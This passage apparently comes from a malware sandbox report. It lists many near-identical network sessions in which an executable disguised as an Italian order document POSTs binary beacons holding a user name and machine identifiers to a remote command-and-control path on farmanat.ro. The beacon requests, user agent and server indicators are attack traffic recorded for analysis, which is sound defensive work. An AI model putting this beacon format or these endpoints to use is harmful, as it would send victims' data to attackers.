                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              565192.168.11.2050409176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:56.526257038 CET7098OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:56.560775042 CET7099OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:56.611107111 CET7099INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              566192.168.11.2050410176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:57.024559021 CET7100OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:57.058769941 CET7100OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:57.109306097 CET7100INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              567192.168.11.2050411176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:57.529844999 CET7101OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:57.563415051 CET7101OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:57.614809036 CET7102INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              568192.168.11.2050412176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:58.031682968 CET7102OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:58.065882921 CET7103OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:58.180129051 CET7103INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              569192.168.11.2050413176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:58.610007048 CET7104OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:58.644468069 CET7104OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:58.700189114 CET7104INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              57192.168.11.2049893176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:38.005112886 CET6388OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:38.038376093 CET6388OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:38.094413042 CET6389INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              570192.168.11.2050414176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:59.074620962 CET7105OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:59.108258009 CET7105OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:59.157382965 CET7106INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              571192.168.11.2050415176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:59.567878962 CET7106OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:59.602237940 CET7106OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:59.651905060 CET7107INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              572192.168.11.2050416176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:00.086672068 CET7108OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:00.120341063 CET7108OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:00.169751883 CET7108INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              573192.168.11.2050417176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:00.611074924 CET7109OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:00.645057917 CET7109OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:00.696907043 CET7110INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              574192.168.11.2050418176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:01.130911112 CET7110OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:01.164452076 CET7110OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:01.218281984 CET7111INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              575192.168.11.2050419176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:01.578295946 CET7112OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:01.612272978 CET7112OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:01.661658049 CET7112INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              576192.168.11.2050420176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:02.060782909 CET7113OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:02.095108986 CET7113OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:02.145915031 CET7114INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              577192.168.11.2050421176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:02.537939072 CET7114OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:02.571285963 CET7114OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:02.620155096 CET7115INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              578192.168.11.2050422176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:03.009357929 CET7116OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:03.042840004 CET7116OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:03.101900101 CET7116INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              579192.168.11.2050423176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:03.550199986 CET7117OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:03.583940029 CET7117OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:03.633420944 CET7117INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              58192.168.11.2049894176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:38.572494984 CET6390OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:38.605989933 CET6390OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:38.655184984 CET6390INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              580192.168.11.2050424176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:04.065979958 CET7118OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:04.100127935 CET7118OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:04.149718046 CET7119INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              581192.168.11.2050425176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:04.540647030 CET7120OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:04.574812889 CET7120OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:04.624695063 CET7120INHTTP/1.1 404 Not Found
                                              Server: nginx
